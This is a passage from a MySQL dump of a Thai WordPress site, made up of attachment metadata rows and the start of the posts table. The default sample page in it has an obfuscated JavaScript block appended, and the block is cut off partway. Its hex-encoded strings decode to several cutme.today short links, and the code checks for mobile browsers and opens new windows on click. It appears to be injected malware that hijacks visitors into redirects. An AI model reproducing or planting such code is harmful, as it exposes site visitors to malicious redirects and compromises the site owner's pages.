:37:\"ilovepdf_merged_page-0003-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15608;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2446,780,'_wp_attached_file','2026/03/ilovepdf_merged_page-0004.jpg'),
(2447,780,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1755;s:6:\"height\";i:1240;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0004.jpg\";s:8:\"filesize\";i:631788;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0004-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15128;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0004-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:98251;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0004-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0004-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66566;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0004-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21995;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0004-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48791;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0004-1536x1085.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:171706;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0004-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16124;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2448,781,'_wp_attached_file','2026/03/ilovepdf_merged_page-0005.jpg'),
(2449,781,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1650;s:6:\"height\";i:1275;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0005.jpg\";s:8:\"filesize\";i:466041;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0005-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14401;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0005-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:126408;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0005-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4942;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0005-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72802;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0005-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18260;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0005-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0005-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:207089;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0005-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19430;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2450,782,'_wp_attached_file','2026/03/ilovepdf_merged_page-0006.jpg'),
(2451,782,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1650;s:6:\"height\";i:1275;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0006.jpg\";s:8:\"filesize\";i:375917;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0006-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11164;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0006-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96024;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0006-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4254;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0006-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55866;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0006-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14352;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0006-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34987;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0006-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165431;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0006-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15137;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2452,783,'_wp_attached_file','2026/03/ilovepdf_merged_page-0007.jpg'),
(2453,783,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1650;s:6:\"height\";i:1275;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0007.jpg\";s:8:\"filesize\";i:343858;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0007-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11229;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0007-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78703;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0007-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4483;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0007-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51059;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0007-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15573;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0007-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34195;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0007-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143934;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0007-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13844;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2454,784,'_wp_attached_file','2026/03/ilovepdf_merged_page-0008.jpg'),
(2455,784,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1650;s:6:\"height\";i:1275;s:4:\"file\";s:37:\"2026/03/ilovepdf_merged_page-0008.jpg\";s:8:\"filesize\";i:69962;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0008-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2745;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"ilovepdf_merged_page-0008-1024x791.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:791;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20344;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0008-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1601;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0008-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12664;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0008-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3611;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0008-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8389;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"ilovepdf_merged_page-0008-1536x1187.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1187;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42019;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:37:\"ilovepdf_merged_page-0008-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2456,785,'_wp_attached_file','2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1.jpg'),
(2457,785,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1479;s:6:\"height\";i:1109;s:4:\"file\";s:92:\"2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1.jpg\";s:8:\"filesize\";i:422639;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19668;}s:5:\"large\";a:5:{s:4:\"file\";s:93:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:153888;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7183;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95366;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21865;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51285;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18885;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2458,786,'_wp_attached_file','2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2.jpg'),
(2459,786,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1479;s:6:\"height\";i:1109;s:4:\"file\";s:92:\"2026/03/LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2.jpg\";s:8:\"filesize\";i:530578;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23715;}s:5:\"large\";a:5:{s:4:\"file\";s:93:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:190970;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9038;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117620;}s:15:\"tbms-custom-300\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29346;}s:15:\"tbms-custom-500\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71253;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:92:\"LINE_ALBUM_ปลูกหญ้าอาคารใหม่-29-10-66_260327_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24486;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2460,776,'_edit_last','1'),
(2461,776,'title_style','default'),
(2462,776,'_title_style','field_5d1a0217cf408'),
(2463,787,'title_style','default'),
(2464,787,'_title_style','field_5d1a0217cf408'),
(2467,776,'_thumbnail_id','777'),
(2470,776,'related',''),
(2471,776,'_related','field_603b51c3e183e'),
(2472,787,'related',''),
(2473,787,'_related','field_603b51c3e183e'),
(2478,788,'title_style','default'),
(2479,788,'_title_style','field_5d1a0217cf408'),
(2480,788,'related',''),
(2481,788,'_related','field_603b51c3e183e');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`),
  KEY `type_status_author` (`post_type`,`post_status`,`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=789 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES
(2,1,'2024-07-27 20:27:17','2024-07-27 13:27:17','<!-- wp:paragraph -->\n<p>นี่คือหน้าตัวอย่าง มันแตกต่างจากเรื่องของบล็อกเพราะว่ามันจะอยู่ในที่ที่เดียว และจะถูกแสดงออกมาในการใช้งานเว็บของคุณ (ในธีมส่วนใหญ่) หลายคนเริ่มด้วยหน้าเกี่ยวกับ ซึ่งจะแนะนำพวกเขาถึงผู้เยี่ยมชมเว็บที่เป็นไปได้ มันอาจจะพูดถึงบางสิ่งประมาณนี้:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>สวัสดี! ฉันเป็นพนักงานส่งของในตอนกลางวัน ปรารถนาเป็นนักแสดงในตอนกลางคืน และนี่คือเว็บของฉัน ฉันอาศัยอยู่ที่ลอสแองเจลิส มีสุนัขที่ยอดเยี่ยมชื่อแจ๊ค และฉันชื่นชอบพีน่า โคลาด้า (และกำลังติดฝนอยู่)</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>...หรือบางสิ่งคล้ายกันนี้:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>บริษัทของเด็กเล่น XYZ ก่อตั้งในปี 1971 และได้จัดจำหน่ายของเด็กเล่นที่มีคุณภาพสู่สาธารณะตั้งแต่นั้นมา ตั้งอยู่ที่เมืองกอร์ทเทม บริษัทจ้างงานกว่า 2,000 คนและได้ทำสิ่งที่ดีเลิศมากมายสำหรับชุมชนเมืองกอร์ทเทม</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>ในฐานะผู้ใช้ WordPress ใหม่ คุณควรจะไปที่ <a href=\"http://watprato.ssk.in.th/wp-admin/\">แผงควบคุมของคุณ</a> เพื่อลบหน้านี้ และสร้างหน้าใหม่สำหรับเนื้อหาของคุณ สนุกกัน!</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 